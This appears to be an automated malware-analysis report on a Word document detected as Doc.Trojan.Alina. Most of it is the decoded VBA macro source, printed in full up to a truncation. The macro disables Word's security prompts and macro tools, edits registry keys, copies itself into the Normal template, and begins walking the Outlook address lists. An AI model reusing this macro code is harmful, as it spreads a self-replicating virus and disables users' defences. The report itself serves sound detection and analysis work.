Verdict: MALICIOUS
Risk Score: 260

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV detections indicate this is a known malicious document, specifically identified as Doc.Trojan.Alina. The VBA macros, particularly the Document_Open subroutine, are designed to execute code that modifies registry keys related to system security and owner information. The script attempts to disable macro security warnings and potentially alter persistence mechanisms, suggesting it's a downloader or part of a larger infection chain.
Heuristics (5)

- ClamAV: Doc.Trojan.Alina-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Alina-3
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5472 bytes | 6b3d626de73322c77b29c0f2c18ff475cc9e7872a477b33daead316ed49b995c | ClamAV: Doc.Trojan.Alina-1 | unlikely |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "Jhuma"
Attribute VB_Base = "1Normal.Love"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Call Alina
End Sub
Private Sub Document_Open()
Call Alina
End Sub
Private Sub Alina()
On Error Resume Next
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
CustomizationContext = NormalTemplate
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") <> "Fateha" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Fateha"
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") <> "Fateha/Alina/Liton" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Fateha/Alina/Liton"
End If
Set ADC1 = ActiveDocument.VBProject.VBComponents(1)
Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
ExportFile1 = Application.StartupPath + "\~Alina.tmp"
ExportFile2 = Application.StartupPath + "\~Love.tmp"
If Dir(ExportFile1) = "~Alina.tmp" Then Kill ExportFile1
If Dir(ExportFile2) = "~Love.tmp" Then Kill ExportFile2
If ADC1.CodeModule.CountOfLines > 0 Then ADC1.Export (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then NDC1.Export (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To ADC1.CodeModule.CountOfLines: ADC1.CodeModule.DeleteLines 1: Next
End If
ADC1.CodeModule.AddFromFile (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next
Else
ADC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next: End If
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To NDC1.CodeModule.CountOfLines
NDC1.CodeModule.DeleteLines 1: Next
End If
NDC1.CodeModule.AddFromFile (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
Else
NDC1.CodeModule.AddFromFile (ExportFile2)
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
End If
If NDC1.Name <> "Love" Then NDC1.Name = "Love"
If Day(Now) > 0 And Day(Now) < 8 Then
If ADC1.Name <> "Love" Then
ADC1.Name = "Love"
Application.UserAddress = "Liton" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 7 And Day(Now) < 16 Then
If ADC1.Name <> "Jhuma" Then
ADC1.Name = "Jhuma"
Application.UserAddress = "Jhuma" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 15 And Day(Now) < 22 Then
If ADC1.Name <> "Love" Then
ADC1.Name = "Love"
Application.UserAddress = "Fateha" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 21 And Day(Now) < 31 Then
If ADC1.Name <> "Lutfur" Then
ADC1.Name = "Lutfur"
Application.UserAddress = "Lutfur" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
Dim UDO, DMN, BUOS
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
DMN.Logon "profile", "password"
For l = DMN.AddressLists.Count To 1 Step -1
Set ADB = DMN.AddressLists(l)
i = 0
Set BUO
... (truncated)
```